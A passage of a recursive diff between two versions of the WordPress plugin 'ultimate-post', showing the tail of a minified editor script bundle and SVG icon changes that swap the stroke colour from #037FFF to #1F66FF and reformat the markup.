a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(886),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},2156:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(283),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},977:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(4421),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},7376:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(2041),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},6680:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(6657),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},3479:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(2793),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},4602:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(4558),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},3358:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(6922),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},2413:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(439),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},6509:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(9839),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},619:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(1211),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},2158:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(1589),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},4201:(e,t,n)=>{"use strict";var a=n(3379),r=n.n(a),o=n(7795),i=n.n(o),l=n(569),s=n.n(l),p=n(3565),c=n.n(p),d=n(9216),u=n.n(d),m=n(4589),f=n.n(m),h=n(1729),g={};g.styleTagTransform=f(),g.setAttributes=c(),g.insert=s().bind(null,"head"),g.domAPI=i(),g.insertStyleElement=u(),r()(h.Z,g),h.Z&&h.Z.locals&&h.Z.locals},3379:e=>{"use strict";var t=[];function n(e){for(var n=-1,a=0;a<t.length;a++)if(t[a].identifier===e){n=a;break}return n}function a(e,a){for(var o={},i=[],l=0;l<e.length;l++){var s=e[l],p=a.base?s[0]+a.base:s[0],c=o[p]||0,d="".concat(p," ").concat(c);o[p]=c+1;var u=n(d),m={css:s[1],media:s[2],sourceMap:s[3],supports:s[4],layer:s[5]};if(-1!==u)t[u].references++,t[u].updater(m);else{var f=r(m,a);a.byIndex=l,t.splice(l,0,{identifier:d,updater:f,references:1})}i.push(d)}return i}function r(e,t){var n=t.domAPI(t);return n.update(e),function(t){if(t){if(t.css===e.css&&t.media===e.media&&t.sourceMap===e.sourceMap&&t.supports===e.supports&&t.layer===e.layer)return;n.update(e=t)}else n.remove()}}e.exports=function(e,r){var o=a(e=e||[],r=r||{});return function(e){e=e||[];for(var i=0;i<o.length;i++){var l=n(o[i]);t[l].references--}for(var s=a(e,r),p=0;p<o.length;p++){var c=n(o[p]);0===t[c].references&&(t[c].updater(),t.splice(c,1))}o=s}}},569:e=>{"use strict";var t={};e.exports=function(e,n){var a=function(e){if(void 0===t[e]){var n=document.querySelector(e);if(window.HTMLIFrameElement&&n instanceof window.HTMLIFrameElement)try{n=n.contentDocument.head}catch(e){n=null}t[e]=n}return t[e]}(e);if(!a)throw new Error("Couldn't find a style target. This probably means that the value for the 'insert' parameter is invalid.");a.appendChild(n)}},9216:e=>{"use strict";e.exports=function(e){var t=document.createElement("style");return e.setAttributes(t,e.attributes),e.insert(t,e.options),t}},3565:(e,t,n)=>{"use strict";e.exports=function(e){var t=n.nc;t&&e.setAttribute("nonce",t)}},7795:e=>{"use strict";e.exports=function(e){if("undefined"==typeof document)return{update:function(){},remove:function(){}};var t=e.insertStyleElement(e);return{update:function(n){!function(e,t,n){var a="";n.supports&&(a+="@supports (".concat(n.supports,") {")),n.media&&(a+="@media ".concat(n.media," {"));var r=void 0!==n.layer;r&&(a+="@layer".concat(n.layer.length>0?" ".concat(n.layer):""," {")),a+=n.css,r&&(a+="}"),n.media&&(a+="}"),n.supports&&(a+="}");var o=n.sourceMap;o&&"undefined"!=typeof btoa&&(a+="\n/*# sourceMappingURL=data:application/json;base64,".concat(btoa(unescape(encodeURIComponent(JSON.stringify(o))))," */")),t.styleTagTransform(a,e,t.options)}(t,e,n)},remove:function(){!function(e){if(null===e.parentNode)return!1;e.parentNode.removeChild(e)}(t)}}}},4589:e=>{"use strict";e.exports=function(e,t){if(t.styleSheet)t.styleSheet.cssText=e;else{for(;t.firstChild;)t.removeChild(t.firstChild);t.appendChild(document.createTextNode(e))}}},5022:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7680),r={contextDelimiter:"",onMissingKey:null};function o(e,t){var n;for(n in this.data=e,this.pluralForms={},this.options={},r)this.options[n]=void 0!==t&&n in t?t[n]:r[n]}o.prototype.getPluralForm=function(e,t){var n,r,o,i=this.pluralForms[e];return i||("function"!=typeof(o=(n=this.data[e][""])["Plural-Forms"]||n["plural-forms"]||n.plural_forms)&&(r=function(e){var t,n,a;for(t=e.split(";"),n=0;n<t.length;n++)if(0===(a=t[n].trim()).indexOf("plural="))return a.substr(7)}(n["Plural-Forms"]||n["plural-forms"]||n.plural_forms),o=(0,a.Z)(r)),i=this.pluralForms[e]=o),i(t)},o.prototype.dcnpgettext=function(e,t,n,a,r){var o,i,l;return o=void 0===r?0:this.getPluralForm(e,r),i=n,t&&(i=t+this.options.contextDelimiter+n),(l=this.data[e][i])&&l[o]?l[o]:(this.options.onMissingKey&&this.options.onMissingKey(n,e),0===o?n:a)}},4975:e=>{"use strict";e.exports="data:image/svg+xml,%3Csvg width=%2742%27 height=%2742%27 viewBox=%270 0 42 42%27 fill=%27none%27 xmlns=%27http://www.w3.org/2000/svg%27%3E%3Cpath d=%27M0 42V7C0 3.13401 3.13401 0 7 0H42L0 42Z%27 fill=%27%23FF285E%27/%3E%3C/svg%3E"},7462:(e,t,n)=>{"use strict";function a(){return a=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var a in n)Object.prototype.hasOwnProperty.call(n,a)&&(e[a]=n[a])}return e},a.apply(this,arguments)}n.d(t,{Z:()=>a})},6290:(e,t,n)=>{"use strict";function a(e,t){var n,a,r=0;function o(){var o,i,l=n,s=arguments.length;e:for(;l;){if(l.args.length===arguments.length){for(i=0;i<s;i++)if(l.args[i]!==arguments[i]){l=l.next;continue e}return l!==n&&(l===a&&(a=l.prev),l.prev.next=l.next,l.next&&(l.next.prev=l.prev),l.next=n,l.prev=null,n.prev=l,n=l),l.val}l=l.next}for(o=new Array(s),i=0;i<s;i++)o[i]=arguments[i];return l={args:o,val:e.apply(null,o)},n?(n.prev=l,l.next=n):a=l,r===t.maxSize?(a=a.prev).next=null:r++,n=l,l.val}return t=t||{},o.clear=function(){n=null,a=null,r=0},o}n.d(t,{Z:()=>a})}},t={};function n(a){var r=t[a];if(void 0!==r)return r.exports;var o=t[a]={id:a,exports:{}};return e[a](o,o.exports,n),o.exports}n.m=e,n.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return n.d(t,{a:t}),t},n.d=(e,t)=>{for(var a in t)n.o(t,a)&&!n.o(e,a)&&Object.defineProperty(e,a,{enumerable:!0,get:t[a]})},n.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),n.b=document.baseURI||self.location.href,n.nc=void 0,(()=>{"use strict";var e=n(7294),t=n(3935),a=n(8351);if(document.querySelector(".block-editor-page")){const{subscribe:n}=wp.data,r=n((()=>{let n=document.querySelector(".editor-header__toolbar");if(n||(n=document.querySelector(".edit-post-header__toolbar")),n||(n=document.querySelector(".edit-post-header-toolbar")),!n)return;const o=document.createElement("div");o.className="toolbar-insert-layout",o.innerHTML='<button id="UltpConditionButton" class="ultp-popup-button" aria-label="Insert Layout"><span class="dashicons dashicons-admin-settings"></span>Condition</button>',["404","front_page"].includes(ultp_data.archive)||n.appendChild(o),setTimeout((function(){void 0!==document.getElementsByClassName("edit-post-fullscreen-mode-close")[0]&&(document.getElementsByClassName("edit-post-fullscreen-mode-close")[0].href=ultp_condition.builder_url)}),0);let i=1;function l(){if(i){const n=document.createElement("div");n.id="ultp-modal-conditions",n.className="ultp-builder-modal ultp-blocks-layouts",document.body.appendChild(n),t.render((0,e.createElement)(a.Z,{has_ultp_condition:!0,notEditor:"yes"}),n),i=0,setTimeout((function(){i=1}),2e3)}}void 0!==document.getElementsByClassName("editor-post-publish-button__button editor-post-publish-panel__toggle")[0]&&(["404","front_page"].includes(ultp_data.archive)||l()),["404","front_page"].includes(ultp_data.archive)||document.getElementById("UltpConditionButton")?.addEventListener("click",(function(){l()})),r()}))}})()})();
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/accordion-item.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/accordion-item.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/accordion-item.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/accordion-item.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,10 +1,11 @@
 <svg width="50" height="50" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M4 7L11 7" stroke="#037FFF" stroke-linecap="round" stroke-linejoin="round"/>
-<path d="M18 6L20 7.99998" stroke="#037FFF" stroke-linecap="round"/>
-<path d="M18 8L20 6.00002" stroke="#037FFF" stroke-linecap="round"/>
-<rect x="1" y="4" width="22" height="16" rx="1" stroke="#037FFF" stroke-width="1.5" stroke-linejoin="round"/>
-<path d="M1 10C1 10 14.4085 10 23 10" stroke="#037FFF" stroke-width="1.5"/>
-<path d="M4 13H14" stroke="#037FFF" stroke-linecap="round"/>
-<path d="M4 15H15" stroke="#037FFF" stroke-linecap="round"/>
-<path d="M4 17H10" stroke="#037FFF" stroke-linecap="round"/>
-</svg>
+    <path d="M4 7L11 7" stroke="#1F66FF" stroke-linecap="round" stroke-linejoin="round" />
+    <path d="M18 6L20 7.99998" stroke="#1F66FF" stroke-linecap="round" />
+    <path d="M18 8L20 6.00002" stroke="#1F66FF" stroke-linecap="round" />
+    <rect x="1" y="4" width="22" height="16" rx="1" stroke="#1F66FF" stroke-width="1.5"
+        stroke-linejoin="round" />
+    <path d="M1 10C1 10 14.4085 10 23 10" stroke="#1F66FF" stroke-width="1.5" />
+    <path d="M4 13H14" stroke="#1F66FF" stroke-linecap="round" />
+    <path d="M4 15H15" stroke="#1F66FF" stroke-linecap="round" />
+    <path d="M4 17H10" stroke="#1F66FF" stroke-linecap="round" />
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/accordion.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/accordion.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/accordion.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/accordion.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,10 +1,14 @@
 <svg width="50" height="50" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M3 4C3 3.44772 3.44772 3 4 3H20C20.5523 3 21 3.44772 21 4V8C21 8.55228 20.5523 9 20 9H4C3.44772 9 3 8.55228 3 8V4Z" stroke="#037FFF" stroke-width="1.5" stroke-linejoin="round"/>
-<path d="M3 12.5C3 11.9477 3.44772 11.5 4 11.5H20C20.5523 11.5 21 11.9477 21 12.5V20C21 20.5523 20.5523 21 20 21H4C3.44772 21 3 20.5523 3 20V12.5Z" stroke="#037FFF" stroke-width="1.5" stroke-linejoin="round"/>
-<path d="M6 6L11 6" stroke="#037FFF" stroke-linecap="round" stroke-linejoin="round"/>
-<path d="M6 14.5L11 14.5" stroke="#037FFF" stroke-linecap="round" stroke-linejoin="round"/>
-<path d="M16.5 4.5V7.5" stroke="#037FFF" stroke-linecap="round"/>
-<path d="M15.4395 13.4393L17.5608 15.5607" stroke="#037FFF" stroke-linecap="round"/>
-<path d="M15 6L18 6" stroke="#037FFF" stroke-linecap="round"/>
-<path d="M15.4395 15.5607L17.5608 13.4393" stroke="#037FFF" stroke-linecap="round"/>
-</svg>
+    <path
+        d="M3 4C3 3.44772 3.44772 3 4 3H20C20.5523 3 21 3.44772 21 4V8C21 8.55228 20.5523 9 20 9H4C3.44772 9 3 8.55228 3 8V4Z"
+        stroke="#1F66FF" stroke-width="1.5" stroke-linejoin="round" />
+    <path
+        d="M3 12.5C3 11.9477 3.44772 11.5 4 11.5H20C20.5523 11.5 21 11.9477 21 12.5V20C21 20.5523 20.5523 21 20 21H4C3.44772 21 3 20.5523 3 20V12.5Z"
+        stroke="#1F66FF" stroke-width="1.5" stroke-linejoin="round" />
+    <path d="M6 6L11 6" stroke="#1F66FF" stroke-linecap="round" stroke-linejoin="round" />
+    <path d="M6 14.5L11 14.5" stroke="#1F66FF" stroke-linecap="round" stroke-linejoin="round" />
+    <path d="M16.5 4.5V7.5" stroke="#1F66FF" stroke-linecap="round" />
+    <path d="M15.4395 13.4393L17.5608 15.5607" stroke="#1F66FF" stroke-linecap="round" />
+    <path d="M15 6L18 6" stroke="#1F66FF" stroke-linecap="round" />
+    <path d="M15.4395 15.5607L17.5608 13.4393" stroke="#1F66FF" stroke-linecap="round" />
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/advanced-sort-filter.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/advanced-sort-filter.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/advanced-sort-filter.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/advanced-sort-filter.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,6 +1,10 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M19.4983 23H4.50167C2.5675 23 1 21.4325 1 19.4983V4.50167C1 2.5675 2.5675 1 4.50167 1H19.4983C21.4325 1 23 2.5675 23 4.50167V19.4983C23 21.4325 21.4325 23 19.4983 23ZM4.50167 2.375C3.32833 2.375 2.375 3.32833 2.375 4.50167V19.4983C2.375 20.6717 3.32833 21.625 4.50167 21.625H19.4983C20.6717 21.625 21.625 20.6717 21.625 19.4983V4.50167C21.625 3.32833 20.6717 2.375 19.4983 2.375H4.50167Z" fill="#037FFF"/>
-<path d="M17.6283 8.49841H11.0649V9.87341H17.6283V8.49841Z" fill="#037FFF"/>
-<path d="M15.7491 10.845H11.0649V12.22H15.7491V10.845Z" fill="#037FFF"/>
-<path d="M11.5141 13.3933L9.87324 15.025V7.3158H8.49824V15.025L6.85741 13.3933L5.88574 14.365L9.18574 17.6558L12.4857 14.365L11.5141 13.3933Z" fill="#037FFF"/>
-</svg>
+    <path
+        d="M19.4983 23H4.50167C2.5675 23 1 21.4325 1 19.4983V4.50167C1 2.5675 2.5675 1 4.50167 1H19.4983C21.4325 1 23 2.5675 23 4.50167V19.4983C23 21.4325 21.4325 23 19.4983 23ZM4.50167 2.375C3.32833 2.375 2.375 3.32833 2.375 4.50167V19.4983C2.375 20.6717 3.32833 21.625 4.50167 21.625H19.4983C20.6717 21.625 21.625 20.6717 21.625 19.4983V4.50167C21.625 3.32833 20.6717 2.375 19.4983 2.375H4.50167Z"
+        fill="#1F66FF" />
+    <path d="M17.6283 8.49841H11.0649V9.87341H17.6283V8.49841Z" fill="#1F66FF" />
+    <path d="M15.7491 10.845H11.0649V12.22H15.7491V10.845Z" fill="#1F66FF" />
+    <path
+        d="M11.5141 13.3933L9.87324 15.025V7.3158H8.49824V15.025L6.85741 13.3933L5.88574 14.365L9.18574 17.6558L12.4857 14.365L11.5141 13.3933Z"
+        fill="#1F66FF" />
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/author-filter.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/author-filter.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/author-filter.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/author-filter.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,4 +1,8 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M19.4983 23H4.50167C2.5675 23 1 21.4325 1 19.4983V4.50167C1 2.5675 2.5675 1 4.50167 1H19.4983C21.4325 1 23 2.5675 23 4.50167V19.4983C23 21.4325 21.4325 23 19.4983 23ZM4.50167 2.375C3.32833 2.375 2.375 3.32833 2.375 4.50167V19.4983C2.375 20.6717 3.32833 21.625 4.50167 21.625H19.4983C20.6717 21.625 21.625 20.6717 21.625 19.4983V4.50167C21.625 3.32833 20.6717 2.375 19.4983 2.375H4.50167Z" fill="#037FFF"/>
-<path d="M14.3466 11.7709C15.0524 11.1292 15.5016 10.2125 15.5016 9.18587C15.5016 7.26087 13.9341 5.6842 11.9999 5.6842C10.0657 5.6842 8.49825 7.2517 8.49825 9.18587C8.49825 10.2125 8.94741 11.1292 9.65325 11.7709C7.33408 12.7059 5.68408 14.9792 5.68408 17.6284H7.05908C7.05908 14.9059 9.27742 12.6875 11.9999 12.6875C14.7224 12.6875 16.9407 14.9059 16.9407 17.6284H18.3157C18.3157 14.9792 16.6657 12.7059 14.3466 11.7709ZM9.87325 9.18587C9.87325 8.01254 10.8266 7.0592 11.9999 7.0592C13.1732 7.0592 14.1266 8.01254 14.1266 9.18587C14.1266 10.3592 13.1732 11.3125 11.9999 11.3125C10.8266 11.3125 9.87325 10.3592 9.87325 9.18587Z" fill="#037FFF"/>
-</svg>
+    <path
+        d="M19.4983 23H4.50167C2.5675 23 1 21.4325 1 19.4983V4.50167C1 2.5675 2.5675 1 4.50167 1H19.4983C21.4325 1 23 2.5675 23 4.50167V19.4983C23 21.4325 21.4325 23 19.4983 23ZM4.50167 2.375C3.32833 2.375 2.375 3.32833 2.375 4.50167V19.4983C2.375 20.6717 3.32833 21.625 4.50167 21.625H19.4983C20.6717 21.625 21.625 20.6717 21.625 19.4983V4.50167C21.625 3.32833 20.6717 2.375 19.4983 2.375H4.50167Z"
+        fill="#1F66FF" />
+    <path
+        d="M14.3466 11.7709C15.0524 11.1292 15.5016 10.2125 15.5016 9.18587C15.5016 7.26087 13.9341 5.6842 11.9999 5.6842C10.0657 5.6842 8.49825 7.2517 8.49825 9.18587C8.49825 10.2125 8.94741 11.1292 9.65325 11.7709C7.33408 12.7059 5.68408 14.9792 5.68408 17.6284H7.05908C7.05908 14.9059 9.27742 12.6875 11.9999 12.6875C14.7224 12.6875 16.9407 14.9059 16.9407 17.6284H18.3157C18.3157 14.9792 16.6657 12.7059 14.3466 11.7709ZM9.87325 9.18587C9.87325 8.01254 10.8266 7.0592 11.9999 7.0592C13.1732 7.0592 14.1266 8.01254 14.1266 9.18587C14.1266 10.3592 13.1732 11.3125 11.9999 11.3125C10.8266 11.3125 9.87325 10.3592 9.87325 9.18587Z"
+        fill="#1F66FF" />
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/category-filter.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/category-filter.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/category-filter.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/category-filter.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,4 +1,8 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M19.45 23H4.55C2.59 23 1 21.41 1 19.45V4.55C1 2.59 2.59 1 4.55 1H19.46C21.42 1 23.01 2.59 23.01 4.55V19.46C23.01 21.42 21.42 23.01 19.46 23.01L19.45 23ZM4.55 2.5C3.42 2.5 2.5 3.42 2.5 4.55V19.46C2.5 20.59 3.42 21.51 4.55 21.51H19.46C20.59 21.51 21.51 20.59 21.51 19.46V4.55C21.51 3.42 20.59 2.5 19.46 2.5H4.55Z" fill="#037FFF"/>
-<path d="M17.59 17.41H6.40998C5.47998 17.41 4.72998 16.66 4.72998 15.73V8.27998C4.72998 7.34998 5.47998 6.59998 6.40998 6.59998H11.6C12.06 6.59998 12.5 6.78998 12.82 7.11998L13.96 8.31998C13.96 8.31998 14.04 8.37998 14.09 8.37998H17.59C18.52 8.37998 19.27 9.12998 19.27 10.06V15.74C19.27 16.67 18.52 17.42 17.59 17.42V17.41ZM6.40998 8.08998C6.30998 8.08998 6.22998 8.16998 6.22998 8.26998V15.72C6.22998 15.82 6.30998 15.9 6.40998 15.9H17.59C17.69 15.9 17.77 15.82 17.77 15.72V10.04C17.77 9.93998 17.69 9.85998 17.59 9.85998H14.09C13.63 9.85998 13.19 9.66998 12.87 9.33998L11.73 8.13998C11.73 8.13998 11.65 8.07998 11.6 8.07998H6.40998V8.08998Z" fill="#037FFF"/>
-</svg>
+    <path
+        d="M19.45 23H4.55C2.59 23 1 21.41 1 19.45V4.55C1 2.59 2.59 1 4.55 1H19.46C21.42 1 23.01 2.59 23.01 4.55V19.46C23.01 21.42 21.42 23.01 19.46 23.01L19.45 23ZM4.55 2.5C3.42 2.5 2.5 3.42 2.5 4.55V19.46C2.5 20.59 3.42 21.51 4.55 21.51H19.46C20.59 21.51 21.51 20.59 21.51 19.46V4.55C21.51 3.42 20.59 2.5 19.46 2.5H4.55Z"
+        fill="#1F66FF" />
+    <path
+        d="M17.59 17.41H6.40998C5.47998 17.41 4.72998 16.66 4.72998 15.73V8.27998C4.72998 7.34998 5.47998 6.59998 6.40998 6.59998H11.6C12.06 6.59998 12.5 6.78998 12.82 7.11998L13.96 8.31998C13.96 8.31998 14.04 8.37998 14.09 8.37998H17.59C18.52 8.37998 19.27 9.12998 19.27 10.06V15.74C19.27 16.67 18.52 17.42 17.59 17.42V17.41ZM6.40998 8.08998C6.30998 8.08998 6.22998 8.16998 6.22998 8.26998V15.72C6.22998 15.82 6.30998 15.9 6.40998 15.9H17.59C17.69 15.9 17.77 15.82 17.77 15.72V10.04C17.77 9.93998 17.69 9.85998 17.59 9.85998H14.09C13.63 9.85998 13.19 9.66998 12.87 9.33998L11.73 8.13998C11.73 8.13998 11.65 8.07998 11.6 8.07998H6.40998V8.08998Z"
+        fill="#1F66FF" />
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/clear-filter.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/clear-filter.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/clear-filter.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/clear-filter.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,5 +1,11 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M19.45 23H4.55C2.59 23 1 21.41 1 19.45V4.55C1 2.59 2.59 1 4.55 1H19.46C21.42 1 23.01 2.59 23.01 4.55V19.46C23.01 21.42 21.42 23.01 19.46 23.01L19.45 23ZM4.55 2.5C3.42 2.5 2.5 3.42 2.5 4.55V19.46C2.5 20.59 3.42 21.51 4.55 21.51H19.46C20.59 21.51 21.51 20.59 21.51 19.46V4.55C21.51 3.42 20.59 2.5 19.46 2.5H4.55Z" fill="#037FFF"/>
-<path d="M15.91 12.93C15.91 15.09 14.16 16.84 12 16.84C10.31 16.84 8.88002 15.76 8.34002 14.26H9.81002V12.76H5.77002V16.8H7.27002V15.54C8.19002 17.2 9.97002 18.34 12 18.34C14.98 18.34 17.41 15.91 17.41 12.93H15.91Z" fill="#037FFF"/>
-<path d="M16.7298 7.20003V8.46003C15.8098 6.79003 14.0298 5.66003 11.9998 5.66003C9.01984 5.66003 6.58984 8.09003 6.58984 11.07H8.08984C8.08984 8.91003 9.83984 7.16003 11.9998 7.16003C13.6898 7.16003 15.1198 8.24003 15.6598 9.74003H14.1898V11.24H18.2298V7.20003H16.7298Z" fill="#037FFF"/>
-</svg>
+    <path
+        d="M19.45 23H4.55C2.59 23 1 21.41 1 19.45V4.55C1 2.59 2.59 1 4.55 1H19.46C21.42 1 23.01 2.59 23.01 4.55V19.46C23.01 21.42 21.42 23.01 19.46 23.01L19.45 23ZM4.55 2.5C3.42 2.5 2.5 3.42 2.5 4.55V19.46C2.5 20.59 3.42 21.51 4.55 21.51H19.46C20.59 21.51 21.51 20.59 21.51 19.46V4.55C21.51 3.42 20.59 2.5 19.46 2.5H4.55Z"
+        fill="#1F66FF" />
+    <path
+        d="M15.91 12.93C15.91 15.09 14.16 16.84 12 16.84C10.31 16.84 8.88002 15.76 8.34002 14.26H9.81002V12.76H5.77002V16.8H7.27002V15.54C8.19002 17.2 9.97002 18.34 12 18.34C14.98 18.34 17.41 15.91 17.41 12.93H15.91Z"
+        fill="#1F66FF" />
+    <path
